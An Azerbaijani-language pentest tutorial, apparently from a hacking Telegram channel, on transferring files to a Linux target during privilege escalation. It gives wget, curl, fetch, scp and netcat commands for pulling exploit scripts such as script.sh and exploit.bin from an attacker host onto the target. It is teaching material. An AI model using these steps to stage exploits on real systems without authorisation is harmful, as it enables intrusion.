Linux-da Privilege Escalation zamanı Faylların Ötürülməsi hansı qaydada və necə yerinə yetilir?Faylların Ötürülməsi üçün Linux ƏS-də hansı mümkün kommandalar və üsullar mövcuddur? Məhz bu üsullar Privilege Escalation zamanı Linux-a skript yükləmək üçün istifadə olunacaqdır.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Faylların Ötürülməsi
Linux və Windows əməliyyat sistemi üçün əməliyyatlar yerinə yetirən zaman bizim bu hədəf ƏS-lərinə faylları ötürmək lazım olacaqdır.Əsas da avtomatlaşdırılmış PrivEsc toolları,nüvənin exploit skriptlərində biz faylların ötürülməsindən istifadə edəcəyik.Digər paylaşımlarda Linux ƏS üzərində faylların ötürülməsi ilə tanış olduq bu paylaşımda isə Windows və Linux ƏS üçün daha ətraflı fayl ötürülməsi kommandalarını əhatə edəcəkdir.
Linuxa Faylları Ötürmək
Linux ƏS-ə faylların ötürülməsini kommanda sətri ilə yerinə yetirməyə imkan verən üsulları aşağıda öyrənəcəyik.
- Web serverdən faylı aşağıdakı kommandalar köməyi ilə yükləyi
wget http://192.168.1.1/script.sh
curl -o script.sh http://192.168.1.1/script.sh
FreeBSD sistemləri üçün isə aşağıdakı kommandadan istifadə olunur:
fetch -o script.sh http://192.168.1.1/script.sh
Əgər hədəfə bizim cihazdan fayl yükləmək üçün öz cihazımızda web serveri aktivləşdirməliyik.
Bunu aşağıdakı kommandalar ilə yerinə yetirilir:
#Python köməyi ilə
python3 -m http.server 80
#Apache2 servisinin köməyi ilə
service apache2 start
- Əgər biz hədəf cihaza SSH ilə bağlanmışıq isə və ya SSH istifadəçi məlumatı varsa, o zaman skripti və ya exploiti təhlükəsiz bir şəkildə SCP ilə yükləyə bilərik.(Secure Copy, SCP)
scp (user)@(ip):/(fayl yolu) (lokal yol)
Məsələn: exploit.bin faylını SSH serverindən (İP=192.168.1.1) yükləyərək /tmp qovluğunda saxlayacaqdır.
scp [email protected]:/exploit.bin /tmp
- Əgər hədəf hosta netcat aləti yüklüdürsə, o zaman biz bu alətin köməyi ilə faylı ötürə bilərik.Bunu göstərməyin ən yaxşı yolu Kali cihazımızdan test.txt faylını Ubuntu hostuna ötürməkdir.
Kali cihazında yerinə yetiriləcək kommanda: KALI IP 192.168.10.39
┌──(root㉿kali)-[~]
└─# nc -lvp 1111 < test.txt
listening on [any] 1111 ...
Ubuntu (İstənilən hədəfdə):
┌──(rose㉿Ubuntu)-[~]
└─# nc 192.168.10.39 1111 > test.txt
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat